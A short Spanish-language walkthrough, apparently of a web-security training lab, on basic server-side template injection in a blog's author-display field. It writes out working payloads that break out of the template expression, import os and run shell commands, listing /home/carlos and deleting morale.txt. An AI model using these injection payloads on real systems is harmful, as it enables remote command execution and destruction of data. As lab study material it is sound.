Skip to content

20251117175143.png

Lab: Basic server-side template injection (code context)

En el sitio web encontramos un apartado donde podemos elegir que nombre mostrar en los posts que o comentarios que realizamos. 20251118133616.png

Al interceptar encontraremos un apartado donde se esta enviando

20251118133628.png

20251118134019.png

20251118134355.png

Al enviar el payload {%7*7%}tenemos un error

20251118135020.png

Luego agregamos }}{%7*7%} y al enviar con este payload este envía correctamente.

20251118134420.png

Observamos que efectivamente el payload hace la peticón de 7*7 dando un 49.

20251118134515.png

Con ayuda de este recurso podemos inyectar un payload que nos permita ejecutar comandos.

c

blog-post-author-display=user.name}}{%import+os%}{{os.system('ls+/home/carlos')}}&csrf=wCPr7rs2Vl0bJZ2Wib8SgMfoGCfaLDkC

20251118135441.png

20251118135456.png

Ahora podemos eliminar el recurso que nos indican para completar el laboratorio

c
blog-post-author-display=user.name}}{%import+os%}{{os.system('rm+/home/carlos/morale.txt')}}&csrf=wCPr7rs2Vl0bJZ2Wib8SgMfoGCfaLDkC

20251118135636.png